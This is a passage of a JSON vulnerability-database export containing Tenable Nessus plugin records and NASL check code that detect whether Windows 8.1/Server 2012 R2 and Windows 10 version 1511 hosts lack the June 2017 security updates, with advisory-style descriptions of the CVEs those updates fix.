(CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8473,\n CVE-2017-8474, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. 
(CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022726/windows-8-update-kb4022726\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5f83ad76\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4022717 or Cumulative update KB4022726.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022717', # 8.1 / 2012 R2 Security Only\n '4022726' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / 
Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"06_2017\", bulletin:bulletin, rollup_kb_list:[4022717, 4022726]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:54", "description": "The remote Windows 10 version 1511 host is missing security update\nKB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0216,\n CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. 
(CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. 
An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. 
An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. 
An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)", "edition": 41, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", 
"CVE-2017-8579", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022714.NASL", "href": "https://www.tenable.com/plugins/nessus/100759", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100759);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n 
\"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022714\");\n script_xref(name:\"MSFT\", value:\"MS17-4022714\");\n\n script_name(english:\"KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. 
(CVE-2017-0216,\n CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. 
(CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or reboot. 
(CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. 
(CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022714/windows-10-update-kb4022714\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46ed25c8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022714 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkb = make_list(\n '4022714' # 10 1511\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = 